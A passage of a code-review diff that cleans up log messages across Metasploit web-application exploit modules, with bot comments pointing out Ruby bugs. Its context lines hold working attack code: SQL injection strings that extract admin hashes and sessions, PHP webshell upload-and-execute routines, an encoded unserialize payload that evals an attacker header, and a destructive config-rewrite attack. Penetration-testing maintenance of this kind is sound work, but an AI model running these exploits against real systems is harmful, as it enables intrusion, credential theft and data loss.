#{orig_fname}...") + print_status("Renaming #{orig_fname}...") new_fname = rename(base, orig_fname) - print_status("#{peer} - Executing #{new_fname}...") + print_status("Executing #{new_fname}...") exec(base, new_fname) end end diff --git a/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb b/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb index fc9b180f61..8524edfb3a 100644 --- a/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb 
+++ b/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb @@ -70,11 +70,11 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Preparing payload...") + print_status("Preparing payload...") payload_name = "#{Rex::Text.rand_text_alpha(10)}.php" data = generate_mime_message(payload, payload_name) - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") res = send_request_cgi( 'method' => 'POST', 'uri' => letterbox_upload_url, @@ -84,13 +84,13 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unreachable, 'No response from the target') if res.nil? fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200 - print_status("#{peer} - Parsing server response...") + print_status("Parsing server response...") captures = res.body.match(/\[local_path\] => (.*\.php)/i).captures fail_with(Failure::UnexpectedReply, 'Unable to parse the server response') if captures.nil? || captures[0].nil? payload_url = normalize_uri(target_uri.path, captures[0]) - print_good("#{peer} - Response parsed successfully") + print_good("Response parsed successfully") - print_status("#{peer} - Executing the payload at #{payload_url}") + print_status("Executing the payload at #{payload_url}") register_files_for_cleanup(File.basename(URI.parse(payload_url).path)) send_request_cgi({ 'uri' => payload_url, 'method' => 'GET' }, 5) end diff --git a/modules/exploits/unix/webapp/narcissus_backend_exec.rb b/modules/exploits/unix/webapp/narcissus_backend_exec.rb index f5fdb49389..8660cf678d 100644 --- a/modules/exploits/unix/webapp/narcissus_backend_exec.rb +++ b/modules/exploits/unix/webapp/narcissus_backend_exec.rb 
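Review bot: In the `@@ -84,13 +84,13 @@` hunk of maarch_letterbox_file_upload.rb, `res.body.match(/\[local_path\] => (.*\.php)/i).captures` raises NoMethodError when the body does not match, because `match` returns nil. The `fail_with(Failure::UnexpectedReply, 'Unable to parse the server response')` guard on the next line therefore never runs for the case it is meant to report. Keep the MatchData and test it first: `m = res.body.match(/\[local_path\] => (.*\.php)/i)`, then `fail_with(Failure::UnexpectedReply, 'Unable to parse the server response') if m.nil? || m[1].nil?`, and use `m[1]` where `captures[0]` is read.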
@@ -83,20 +83,20 @@ class Metasploit3 < Msf::Exploit::Remote def check sig = rand_text_alpha(rand(10) + 5) #The string to check - vprint_status("#{peer} - Looking for signature '#{sig}'...") + vprint_status("Looking for signature '#{sig}'...") res = remote_exe("echo #{sig}") if res and res.body =~ /#{sig}/ - vprint_status("#{peer} - Signature '#{sig}' found.") + vprint_status("Signature '#{sig}' found.") return Exploit::CheckCode::Vulnerable else - vprint_status("#{peer} - Signature not found") + vprint_status("Signature not found") return Exploit::CheckCode::Safe end end def exploit - print_status("#{peer} - Sending malicious request...") + print_status("Sending malicious request...") remote_exe(payload.encoded) end diff --git a/modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb b/modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb index f8b6b04ba6..e7d56fcd2f 100644 --- a/modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb +++ b/modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb @@ -77,18 +77,18 @@ class Metasploit3 < Msf::Exploit::Remote # Check for ofc_upload_image.php # def check - print_status("#{peer} - Sending check") + print_status("Sending check") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "ofc_upload_image.php"), }) if not res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown elsif res.code.to_i == 404 - vprint_error("#{peer} - No ofc_upload_image.php found") + vprint_error("No ofc_upload_image.php found") elsif res and res.code == 200 and res.body =~ /Saving your image to/ - vprint_status("#{peer} - Found ofc_upload_image.php") + vprint_status("Found ofc_upload_image.php") return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe 
@@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote # Upload @fname = "#{rand_text_alphanumeric(rand(10)+6)}.php" - print_status("#{peer} - Uploading '#{@fname}' (#{payload.encoded.length} bytes)...") + print_status("Uploading '#{@fname}' (#{payload.encoded.length} bytes)...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'ofc_upload_image.php'), @@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote elsif res.body =~ /Saving your image to: (.+)#{@fname}/ path = $1 register_files_for_cleanup(@fname) - print_status("#{peer} - Executing '#{path}#{@fname}'") + print_status("Executing '#{path}#{@fname}'") else fail_with(Failure::NotVulnerable, "#{peer} - File wasn't uploaded, aborting!") end diff --git a/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb b/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb index 5672d926bd..8e91a2ef42 100644 --- a/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb +++ b/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - print_status("#{peer} - Trying to detect installed version") + print_status("Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - vprint_status("#{peer} - Version #{version} detected") + vprint_status("Version #{version} detected") if version < "4.1.2" return Exploit::CheckCode::Appears @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote end def login(base, name, pass) - #print_status("#{peer} - Logging in as non-admin user [ #{datastore['USER']} ]") + #print_status("Logging in as non-admin user [ #{datastore['USER']} ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri("#{base}", "interface", "main", "main_screen.php"), 
@@ -120,7 +120,7 @@ class Metasploit3 < Msf::Exploit::Remote sqli << "FROM users WHERE username = 0x61646d696e LIMIT 0,1),0x#{sqls},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '#{sqlq}'='#{sqlq}" post_data = "form_pubpid=#{sqli}" - print_status("#{peer} - Retrieving admin password hash through SQLi") + print_status("Retrieving admin password hash through SQLi") res = send_request_cgi({ 'method' => 'POST', 'data' => post_data, @@ -130,7 +130,7 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body =~ /#{sqlq}([a-zA-Z0-9]+)#{sqlq}/ adminhash = $1 - print_status("#{peer} - Admin password hash is [ #{adminhash} ]") + print_status("Admin password hash is [ #{adminhash} ]") else fail_with(Failure::Unknown, "#{peer} - Retrieving admin password failed!") end @@ -147,7 +147,7 @@ class Metasploit3 < Msf::Exploit::Remote file = post_data.to_s file.strip! - print_status("#{peer} - Uploading shell [ #{payload_name} ]") + print_status("Uploading shell [ #{payload_name} ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "interface", "super", "manage_site_files.php"), @@ -164,7 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote register_file_for_cleanup(payload_name) - print_status("#{peer} - Requesting shell [ #{uri}/sites/default/images/#{payload_name} ]") + print_status("Requesting shell [ #{uri}/sites/default/images/#{payload_name} ]") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "sites", "default", "images", "#{payload_name}") @@ -173,7 +173,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. if res and res.code != 200 - print_error("#{peer} - Unexpected response, exploit probably failed!") + print_error("Unexpected response, exploit probably failed!") end end 
diff --git a/modules/exploits/unix/webapp/openemr_upload_exec.rb b/modules/exploits/unix/webapp/openemr_upload_exec.rb index 6a25429929..df8f0518c8 100644 --- a/modules/exploits/unix/webapp/openemr_upload_exec.rb +++ b/modules/exploits/unix/webapp/openemr_upload_exec.rb @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote peer = "#{rhost}:#{rport}" # Check version - vprint_status("#{peer} - Trying to detect installed version") + vprint_status("Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -69,14 +69,14 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - vprint_status("#{peer} - Version #{version} detected") + vprint_status("Version #{version} detected") if version > "4.1.1" return Exploit::CheckCode::Safe end # Check for vulnerable component - vprint_status("#{peer} - Trying to detect the vulnerable component") + vprint_status("Trying to detect the vulnerable component") res = send_request_cgi({ 'method' => 'GET', @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote payload_name = rand_text_alpha(rand(10) + 5) + '.php' my_payload = payload.encoded - print_status("#{peer} - Sending PHP payload (#{payload_name})") + print_status("Sending PHP payload (#{payload_name})") res = send_request_raw({ 'method' => 'POST', 'uri' => normalize_uri("#{uri}", "library", "openflashchart", "php-ofc-library", "ofc_upload_image.php") + "?name=#{payload_name}", @@ -113,7 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote register_file_for_cleanup(payload_name) - print_status("#{peer} - Executing PHP payload (#{payload_name})") + print_status("Executing PHP payload (#{payload_name})") # Execute our payload res = send_request_cgi({ 'method' => 'GET', 
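Review bot: The context line `peer = "#{rhost}:#{rport}"` at the top of the `@@ -56,7 +56,7 @@` hunk (openemr_upload_exec.rb) has no reader left in the visible lines, since every `vprint_status` call here dropped its `#{peer} - ` prefix. If nothing further down in the method interpolates it, the assignment is dead. It also shadows the `peer` helper that the other modules in this patch call without defining a local. I would delete the line, provided the rest of the method does not use it; the method body starts and ends outside the hunk.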
@@ -123,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. Print the status code for debugging purposes. if res and res.code != 200 - print_error("#{peer} - Server returned #{res.code.to_s}") + print_error("Server returned #{res.code.to_s}") end end diff --git a/modules/exploits/unix/webapp/opensis_modname_exec.rb b/modules/exploits/unix/webapp/opensis_modname_exec.rb index 9e01b897dc..25611c3bcb 100644 --- a/modules/exploits/unix/webapp/opensis_modname_exec.rb +++ b/modules/exploits/unix/webapp/opensis_modname_exec.rb @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote # def login(user, pass) @cookie = "PHPSESSID=#{rand_text_alphanumeric(rand(10)+10)};" - print_status("#{peer} - Authenticating as user '#{user}'") + print_status("Authenticating as user '#{user}'") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "index.php"), @@ -81,10 +81,10 @@ class Metasploit3 < Msf::Exploit::Remote }.to_a.shuffle] }) if res and res.code == 200 and res.body =~ /Portal\.php/ - print_good("#{peer} - Authenticated as user '#{user}'") + print_good("Authenticated as user '#{user}'") return true else - print_error("#{peer} - Authenticating as user '#{user}' failed") + print_error("Authenticating as user '#{user}' failed") return false end end @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote def execute_command(cmd, opts = { :php_function => 'system' } ) code = Rex::Text.uri_encode(Rex::Text.encode_base64(cmd+"&")) junk = rand_text_alphanumeric(rand(10)+6) - print_status("#{peer} - Sending payload (#{code.length} bytes)") + print_status("Sending payload (#{code.length} bytes)") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'ajax.php'), 
@@ -113,7 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote def check return Exploit::CheckCode::Unknown unless login(datastore['USERNAME'], datastore['PASSWORD']) fingerprint = Rex::Text.rand_text_alphanumeric(rand(10)+10) - vprint_status("#{peer} - Sending check") + vprint_status("Sending check") res = execute_command("echo #{fingerprint}") if res and res.body =~ /align=center>#{fingerprint}/ return Exploit::CheckCode::Vulnerable @@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote ].sample res = execute_command(payload.encoded, { :php_function => php_function }) if res and res.code == 200 and res.body =~ /hacking_log/i - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed") end diff --git a/modules/exploits/unix/webapp/php_charts_exec.rb b/modules/exploits/unix/webapp/php_charts_exec.rb index 722f946e36..3c4ca54256 100644 --- a/modules/exploits/unix/webapp/php_charts_exec.rb +++ b/modules/exploits/unix/webapp/php_charts_exec.rb @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote rand_key_value = rand_text_alphanumeric(rand(10)+6) # send check - print_status("#{peer} - Sending check") + print_status("Sending check") begin res = send_request_cgi({ 'method' => 'GET', @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Vulnerable end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Safe 
@@ -96,14 +96,14 @@ class Metasploit3 < Msf::Exploit::Remote rand_key_value = rand_text_alphanumeric(rand(10)+6) # send payload - print_status("#{peer} - Sending payload (#{code.length} bytes)") + print_status("Sending payload (#{code.length} bytes)") begin res = send_request_cgi({ 'method' => 'GET', 'uri' => "#{base}wizard/url.php?${system(base64_decode(\"#{code}\"))}=#{rand_key_value}" }) if res and res.code == 500 - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed") end diff --git a/modules/exploits/unix/webapp/projectpier_upload_exec.rb b/modules/exploits/unix/webapp/projectpier_upload_exec.rb index 402c9a0d33..71382a1f17 100644 --- a/modules/exploits/unix/webapp/projectpier_upload_exec.rb +++ b/modules/exploits/unix/webapp/projectpier_upload_exec.rb @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw({'uri' => "#{base}/tools#{uri}"}) if res and res.code == 404 - print_error("#{peer} - The upload most likely failed") + print_error("The upload most likely failed") return end @@ -123,15 +123,15 @@ class Metasploit3 < Msf::Exploit::Remote p = get_write_exec_payload(:unlink_self=>true) - print_status("#{peer} - Uploading PHP payload (#{p.length.to_s} bytes)...") + print_status("Uploading PHP payload (#{p.length.to_s} bytes)...") res = upload_php(base, php_fname, p, folder_name) if not res - print_error("#{peer} - No response from server") + print_error("No response from server") return end - print_status("#{peer} - Executing '#{php_fname}'...") + print_status("Executing '#{php_fname}'...") exec_php(base, res) end end diff --git a/modules/exploits/unix/webapp/projectsend_upload_exec.rb b/modules/exploits/unix/webapp/projectsend_upload_exec.rb index d61721a33b..e01415cfb4 100644 --- a/modules/exploits/unix/webapp/projectsend_upload_exec.rb +++ b/modules/exploits/unix/webapp/projectsend_upload_exec.rb 
@@ -59,19 +59,19 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => normalize_uri(target_uri.path, 'process-upload.php') ) if !res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown elsif res.code.to_i == 404 - vprint_error("#{peer} - No process-upload.php found") + vprint_error("No process-upload.php found") return Exploit::CheckCode::Safe elsif res.code.to_i == 500 - vprint_error("#{peer} - Unable to write file") + vprint_error("Unable to write file") return Exploit::CheckCode::Safe elsif res.code.to_i == 200 && res.body && res.body =~ /<\?php/ - vprint_error("#{peer} - File process-upload.php is not executable") + vprint_error("File process-upload.php is not executable") return Exploit::CheckCode::Safe elsif res.code.to_i == 200 && res.body && res.body =~ /sys\.config\.php/ - vprint_error("#{peer} - Software is misconfigured") + vprint_error("Software is misconfigured") return Exploit::CheckCode::Safe elsif res.code.to_i == 200 && res.body && res.body =~ /jsonrpc/ # response on revision 118 onwards includes the file name @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote elsif res.body && res.body =~ /{"jsonrpc" : "2.0", "result" : null, "id" : "id"}/ return Exploit::CheckCode::Appears elsif res.body && res.body =~ /Failed to open output stream/ - vprint_error("#{peer} - Upload folder is not writable") + vprint_error("Upload folder is not writable") return Exploit::CheckCode::Safe else return Exploit::CheckCode::Detected 
@@ -100,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote data = Rex::MIME::Message.new data.add_part(php, 'application/octet-stream', nil, %(form-data; name="file"; filename="#{fname}")) post_data = data.to_s - print_status("#{peer} - Uploading file '#{fname}' (#{php.length} bytes)") + print_status("Uploading file '#{fname}' (#{php.length} bytes)") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "process-upload.php?name=#{fname}"), @@ -121,14 +121,14 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NotVulnerable, "#{peer} - Software is misconfigured") # response on revision 118 onwards includes the file name elsif res.code.to_i == 200 && res.body && res.body =~ /NewFileName/ - print_good("#{peer} - Payload uploaded successfully (#{fname})") + print_good("Payload uploaded successfully (#{fname})") return fname # response on revisions 100 to 117 does not include the file name elsif res.code.to_i == 200 && res.body =~ /{"jsonrpc" : "2.0", "result" : null, "id" : "id"}/ - print_warning("#{peer} - File upload may have failed") + print_warning("File upload may have failed") return fname else - vprint_status("#{peer} - Received response: #{res.code} - #{res.body}") + vprint_status("Received response: #{res.code} - #{res.body}") fail_with(Failure::Unknown, "#{peer} - Something went wrong") end end 
@@ -137,18 +137,18 @@ class Metasploit3 < Msf::Exploit::Remote # Execute uploaded file # def exec(upload_path) - print_status("#{peer} - Executing #{upload_path}...") + print_status("Executing #{upload_path}...") res = send_request_raw( { 'uri' => normalize_uri(target_uri.path, upload_path) }, 5 ) if !res - print_status("#{peer} - Request timed out while executing") + print_status("Request timed out while executing") elsif res.code.to_i == 404 - vprint_error("#{peer} - Not found: #{upload_path}") + vprint_error("Not found: #{upload_path}") elsif res.code.to_i == 200 - vprint_good("#{peer} - Executed #{upload_path}") + vprint_good("Executed #{upload_path}") else - print_error("#{peer} - Unexpected reply") + print_error("Unexpected reply") end end diff --git a/modules/exploits/unix/webapp/seportal_sqli_exec.rb b/modules/exploits/unix/webapp/seportal_sqli_exec.rb index d5385a3fd3..8f8da55d8e 100644 --- a/modules/exploits/unix/webapp/seportal_sqli_exec.rb +++ b/modules/exploits/unix/webapp/seportal_sqli_exec.rb @@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - vprint_status("#{peer} - Trying to detect installed version") + vprint_status("Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - vprint_status("#{peer} - Version #{version} detected") + vprint_status("Version #{version} detected") if version.to_f <= 2.5 return Exploit::CheckCode::Appears @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - print_status("#{peer} - Logging in as user [ #{datastore['USER']} ]") + print_status("Logging in as user [ #{datastore['USER']} ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "login.php"), 
@@ -94,8 +94,8 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 302 and res.get_cookies =~ /sessionid=([a-zA-Z0-9]+)/ session = $1 - print_status("#{peer} - Login successful") - print_status("#{peer} - Session cookie is [ #{session} ]") + print_status("Login successful") + print_status("Session cookie is [ #{session} ]") else fail_with(Failure::Unknown, "#{peer} - Login was not succesful!") end @@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote sqli << "FROM seportal_sessions WHERE session_user_id=1 LIMIT 1" sqli << "),0x#{sqls},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '0x#{sqls}'='0x#{sqls}" - print_status("#{peer} - Retrieving admin session through SQLi") + print_status("Retrieving admin session through SQLi") res = send_request_cgi({ 'method' => 'POST', 'vars_get' => { "sp_id" => sqli }, @@ -119,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body =~ /#{sqlq}([a-zA-Z0-9]+)#{sqlq}/ adminhash = $1 - print_status("#{peer} - Admin session is [ #{adminhash} ]") + print_status("Admin session is [ #{adminhash} ]") else fail_with(Failure::Unknown, "#{peer} - Retrieving admin session failed!") end @@ -140,7 +140,7 @@ class Metasploit3 < Msf::Exploit::Remote file = post_data.to_s file.strip! - print_status("#{peer} - Uploading payload [ #{payload_name} ]") + print_status("Uploading payload [ #{payload_name} ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "admin", "downloads.php"), @@ -157,7 +157,7 @@ class Metasploit3 < Msf::Exploit::Remote register_file_for_cleanup(payload_name) - print_status("#{peer} - Requesting payload [ #{uri}/data/down_media/#{payload_name} ]") + print_status("Requesting payload [ #{uri}/data/down_media/#{payload_name} ]") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "data", "down_media", "#{payload_name}") 
@@ -166,7 +166,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. if res and res.code != 200 - print_error("#{peer} - Unexpected response, exploit probably failed!") + print_error("Unexpected response, exploit probably failed!") end end diff --git a/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb b/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb index 5503487ccc..4d18db356b 100644 --- a/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb +++ b/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb @@ -69,12 +69,12 @@ class Metasploit3 < Msf::Exploit::Remote }) unless res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown end if res.body and res.body.to_s =~ /File Uploading Has Been Disabled/ - vprint_error("#{peer} - File uploads are disabled") + vprint_error("File uploads are disabled") return Exploit::CheckCode::Safe end @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part(php, 'application/octet-stream', nil, "form-data; name=\"fileupload\"; filename=\"#{@fname}\"") post_data = data.to_s - print_status("#{peer} - Uploading PHP payload...") + print_status("Uploading PHP payload...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'upload.php'), 
@@ -113,15 +113,15 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NotFound, "#{peer} - No upload.php found") if res.code.to_i == 404 fail_with(Failure::UnexpectedReply, "#{peer} - Unable to write #{@fname}") if res.body and (res.body =~ /Couldn't copy/ or res.body !~ /file uploaded\!/) - print_good("#{peer} - Payload uploaded successfully.") + print_good("Payload uploaded successfully.") register_files_for_cleanup(@fname) if res.body.to_s =~ /<br>folder to use: .+#{target_uri.path}\/?(.+)<br>/ @upload_path = normalize_uri(target_uri.path, "#{$1}") - print_good("#{peer} - Found upload path #{@upload_path}") + print_good("Found upload path #{@upload_path}") else @upload_path = normalize_uri(target_uri.path, 'in') - print_warning("#{peer} - Could not find upload path - assuming '#{@upload_path}'") + print_warning("Could not find upload path - assuming '#{@upload_path}'") end end @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote # Executes our uploaded malicious file # def exec - print_status("#{peer} - Executing #{@fname}...") + print_status("Executing #{@fname}...") res = send_request_raw({ 'uri' => normalize_uri(@upload_path, @fname), 'cookie' => 'access=3' diff --git a/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb b/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb index 3bdd447427..9a75e1d9cb 100644 --- a/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb +++ b/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb @@ -91,7 +91,7 @@ print "LFI test for storable flaw is: $frozen\n"; =end def check - vprint_status("#{peer} - Sending storable test injection for XXXCHECKXXX.pm load failure") + vprint_status("Sending storable test injection for XXXCHECKXXX.pm load failure") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'), 
@@ -103,7 +103,7 @@ print "LFI test for storable flaw is: $frozen\n"; }) unless res && res.code == 200 && res.body.include?("Can't locate XXXCHECKXXX.pm") - vprint_status("#{peer} - Failed XXXCHECKXXX.pm load test"); + vprint_status("Failed XXXCHECKXXX.pm load test"); return Exploit::CheckCode::Safe end Exploit::CheckCode::Vulnerable @@ -158,14 +158,14 @@ print "RCE payload requiring Object::MultiType and DateTime: $frozen\n"; =end def exploit_nondestructive - print_status("#{peer} - Using nondestructive attack method") + print_status("Using nondestructive attack method") config_payload = "53455247000000000000000304080831323334353637380408080802020000001411084461746554696d6503000000000411155472793a3a54696e793a3a53636f7065477561726402020000001411114f626a6563743a3a4d756c7469547970650411184f626a6563743a3a4d756c7469547970653a3a536176657203010000000a0b4d543a3a72756e5f6170700100000063013d0400004d543b7072696e742071717b436f6e74656e742d747970653a20746578742f706c61696e5c6e5c6e7d3b73797374656d28717b" config_payload << payload.encoded.unpack('H*')[0] config_payload << "7d293b" config_payload << "23" * (1025 - payload.encoded.length) config_payload << "0a657869743b" - print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)") + print_status("Sending payload (#{payload.raw.length} bytes)") send_request_cgi({ 'method' => 'GET', @@ -201,10 +201,10 @@ print "RCE unlink payload requiring CGI: $frozen\n"; =end def exploit_destructive - print_status("#{peer} - Using destructive attack method") + print_status("Using destructive attack method") # First we need to delete mt-config.cgi using the storable injection - print_status("#{peer} - Sending storable injection to unlink mt-config.cgi") + print_status("Sending storable injection to unlink mt-config.cgi") res = send_request_cgi({ 'method' => 'GET', 
@@ -224,7 +224,7 @@ print "RCE unlink payload requiring CGI: $frozen\n"; # Now we rewrite mt-config.cgi to accept a payload - print_status("#{peer} - Rewriting mt-config.cgi to accept the payload") + print_status("Rewriting mt-config.cgi to accept the payload") res = send_request_cgi({ 'method' => 'GET', @@ -247,7 +247,7 @@ print "RCE unlink payload requiring CGI: $frozen\n"; # Finally send the payload - print_status("#{peer} - Sending payload request") + print_status("Sending payload request") send_request_cgi({ 'method' => 'GET', diff --git a/modules/exploits/unix/webapp/skybluecanvas_exec.rb b/modules/exploits/unix/webapp/skybluecanvas_exec.rb index a67c67bbb0..5575ae12fc 100644 --- a/modules/exploits/unix/webapp/skybluecanvas_exec.rb +++ b/modules/exploits/unix/webapp/skybluecanvas_exec.rb @@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw('uri' => uri) if res and res.body =~ /[1.1 r248]/ - vprint_good("#{peer} - SkyBlueCanvas CMS 1.1 r248-xx found") + vprint_good("SkyBlueCanvas CMS 1.1 r248-xx found") return Exploit::CheckCode::Appears end @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit uri = normalize_uri(target_uri.path.to_s, "index.php") - vprint_status("#{peer} - Sending request to #{uri}.") + vprint_status("Sending request to #{uri}.") send_request_cgi({ 'method' => 'POST', diff --git a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb index 6c08aaa9af..918ff7cfb7 100644 --- a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb 
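Review bot: In the skybluecanvas_exec.rb hunk at line 66, the new `vprint_good("SkyBlueCanvas CMS 1.1 r248-xx found")` reports a version match, but the guard above it, `res.body =~ /[1.1 r248]/`, is a character class that matches any body containing one of `1`, `.`, space, `r`, `2`, `4` or `8`. `check` will therefore report `Appears` for almost any responding server, which makes the result unreliable for triage. If the literal text is what is meant, escape it: `res.body =~ /\[1\.1 r248\]/`. The regex sits on an unchanged context line, and `check` starts outside the hunk.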
@@ -63,11 +63,11 @@ class Metasploit3 < Msf::Exploit::Remote f = "pathCache.php" client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") begin - print_warning("#{peer} - Deleting #{f}") + print_warning("Deleting #{f}") client.fs.file.rm(f) - print_good("#{peer} - #{f} removed to stay ninja") + print_good("#{f} removed to stay ninja") rescue - print_warning("#{peer} - Unable to remove #{f}") + print_warning("Unable to remove #{f}") end end end @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoAccess, "#{peer} - Login failed with \"#{username}:#{password}\" (No session ID)") end - print_status("#{peer} - Login successful with #{username}:#{password}") + print_status("Login successful with #{username}:#{password}") data = "module=Contacts&" data << "Contacts2_CONTACT_offset=1&" @@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote #O:10:"SugarTheme":2:{s:10:"*dirName";s:5:"../..";s:20:"SugarTheme_jsCache";s:49:"<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>";} data << "TzoxMDoiU3VnYXJUaGVtZSI6Mjp7czoxMDoiACoAZGlyTmFtZSI7czo1OiIuLi8uLiI7czoyMDoiAFN1Z2FyVGhlbWUAX2pzQ2FjaGUiO3M6NDk6Ijw/cGhwIGV2YWwoYmFzZTY0X2RlY29kZSgkX1NFUlZFUltIVFRQX0NNRF0pKTsgPz4iO30=" - print_status("#{peer} - Exploiting the unserialize()") + print_status("Exploiting the unserialize()") res = send_request_cgi( { @@ -132,7 +132,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Exploit failed: #{res.code}") end - print_status("#{peer} - Executing the payload") + print_status("Executing the payload") res = send_request_cgi( { diff --git a/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb b/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb index b54648b7f0..3f6e06931e 100644 --- a/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb 
